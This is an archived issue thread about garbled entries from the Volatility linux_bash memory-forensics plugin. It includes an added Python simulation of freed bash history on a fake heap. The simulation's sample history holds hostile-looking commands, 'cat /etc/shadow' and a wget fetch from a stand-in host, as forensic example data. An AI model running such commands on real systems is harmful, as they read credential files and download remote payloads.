Closed GoogleCodeExporter closed 9 years ago
Original comment by jamie.l...@gmail.com
on 16 Jun 2013 at 4:00
You are using the -P option which tells the plugin to print unallocated
(previously freed) entries. These entries can be corrupt / overwritten, which
is likely why you are seeing that output. Can you run again without -P and see
what results you get?
Original comment by atc...@gmail.com
on 16 Jun 2013 at 4:03
@thanhphuctp did you get a chance to re-run the plugin like @atcuno asked? Can
this issue be closed?
Original comment by michael.hale@gmail.com
on 20 Jun 2013 at 1:53
@atcuno: thank you, I re-ran without -P but the result is the same. I also tried
changing some parameters; however, nothing changes.
Don't we need to specify the process id of bash in this plugin? It seems to
scan the whole image.
Original comment by thanhphuctp
on 20 Jun 2013 at 3:37
I have looked into this issue and I believe the scanner is simply finding
previously freed entries that appear valid (you can see the timestamp is
correct), but the command part has been overwritten by a later allocation.
These pieces of information are kept in separate places in process memory so it
is entirely possible for this to occur. Unless there is evidence of tampering
with the history in memory by the attacker, I would just ignore the garbled
entries.
Original comment by atc...@gmail.com
on 16 Jul 2013 at 5:34
Also, to answer your question, no, you don't *need* to specify the process id
of bash in the plugin. By default, it only scans processes named "bash" but
there's a command-line switch to make it scan all processes...which is useful
in case an attacker copies /bin/bash to /tmp/a or something. You can read more
about it on the wiki:
https://code.google.com/p/volatility/wiki/LinuxCommandReference23#linux_bash
Original comment by michael.hale@gmail.com
on 19 Jul 2013 at 5:22
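The two points made above (freed history entries whose timestamp still looks valid while the command string has been reused by a later allocation, and the default filter on processes named "bash" that a renamed copy of the shell evades) can be shown with a small simulation. The following is an added example written for this page, not Volatility's linux_bash plugin or any code from the issue: it lays out readline-style history entries (a line pointer, a timestamp pointer and a data pointer, a simplified and assumed layout) in a constructed fake heap, overwrites one freed command the way a later allocation would, and then scans the blob the way the plugin does, by looking for "#<epoch>" timestamp strings and the structs that point to them. The heap base address, the sample commands and the task list are all constructed for the example.

```python
import re
import struct
from datetime import datetime, timezone

PTR = struct.Struct("<Q")            # assumption: 64-bit little-endian pointers
HEAP_BASE = 0x7F0000000000           # assumed load address of the fake heap
TS_RE = re.compile(rb"#(\d{10})\0")  # readline writes timestamps as "#<epoch>"

# Constructed sample history; the last entry is the one we will "free" and reuse.
SAMPLE_ENTRIES = [
    ("ls -la /root", 1371310982),
    ("cat /etc/shadow", 1371311001),
    ("wget http://example.invalid/x", 1371311077),
]
GARBAGE = b"\x01\x02\x03\xff\xfe\x10"  # bytes a later allocation might leave behind

# Constructed task list: pid 4321 is an attacker's copy of /bin/bash as /tmp/a.
TASKS = [{"pid": 1234, "comm": "bash"}, {"pid": 4321, "comm": "a"}]


def build_heap(entries, base=HEAP_BASE):
    """Lay out command strings, '#epoch' strings and {line, timestamp, data}
    pointer triples in one blob, mimicking what bash leaves on its heap."""
    blob = bytearray()
    refs = []
    for command, epoch in entries:
        line_off = len(blob)
        blob += command.encode() + b"\0"
        ts_off = len(blob)
        blob += b"#%d\0" % epoch
        refs.append((line_off, ts_off))
    blob += b"\0" * (-len(blob) % 8)  # align the pointer triples
    for line_off, ts_off in refs:
        blob += PTR.pack(base + line_off) + PTR.pack(base + ts_off) + PTR.pack(0)
    return bytes(blob), refs


def simulate_reuse(heap, offset, data):
    """Model a later allocation landing on a freed command string: the bytes at
    `offset` are overwritten while the struct and timestamp string survive."""
    out = bytearray(heap)
    out[offset:offset + len(data)] = data
    return bytes(out)


def read_cstring(heap, off, limit=256):
    end = heap.find(b"\0", off, off + limit)
    return heap[off:end if end != -1 else off + limit]


def scan_history(heap, base=HEAP_BASE):
    """Find every '#epoch' string, then every aligned struct whose timestamp
    pointer references it, and classify the command it points at."""
    found = []
    for m in TS_RE.finditer(heap):
        needle = PTR.pack(base + m.start())
        pos = heap.find(needle)
        while pos != -1:
            if pos >= 8 and pos % 8 == 0:          # timestamp is the 2nd field
                line_off = PTR.unpack_from(heap, pos - 8)[0] - base
                if 0 <= line_off < len(heap):
                    raw = read_cstring(heap, line_off)
                    printable = all(0x20 <= b < 0x7F for b in raw)
                    epoch = int(m.group(1))
                    found.append({
                        "epoch": epoch,
                        "time": datetime.fromtimestamp(epoch, timezone.utc)
                                        .strftime("%Y-%m-%d %H:%M:%S UTC"),
                        "command": raw.decode("ascii", errors="backslashreplace"),
                        # valid timestamp but non-printable command: most likely a
                        # freed entry whose line buffer was reused, not tampering
                        "status": "ok" if printable else "garbled",
                    })
            pos = heap.find(needle, pos + 1)
    return found


def select_tasks(tasks, scan_all=False):
    """Mirror the plugin's default of scanning only processes whose comm is
    'bash'; scan_all=True catches a shell copied under another name."""
    return [t for t in tasks if scan_all or t["comm"] == "bash"]


if __name__ == "__main__":
    heap, refs = build_heap(SAMPLE_ENTRIES)
    heap = simulate_reuse(heap, refs[2][0], GARBAGE)
    for entry in scan_history(heap):
        print(entry["time"], entry["status"], entry["command"])
    print("default:", select_tasks(TASKS), "all:", select_tasks(TASKS, scan_all=True))
```

Run it and the third entry comes back with its June 2013 timestamp intact and a "garbled" command, which is exactly the pattern described in the thread; the timestamp string and the command string are separate allocations, so one can be reused without the other. The task filter shows why the default scan would miss /tmp/a.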
Original issue reported on code.google.com by
thanhphuctp
on 15 Jun 2013 at 11:03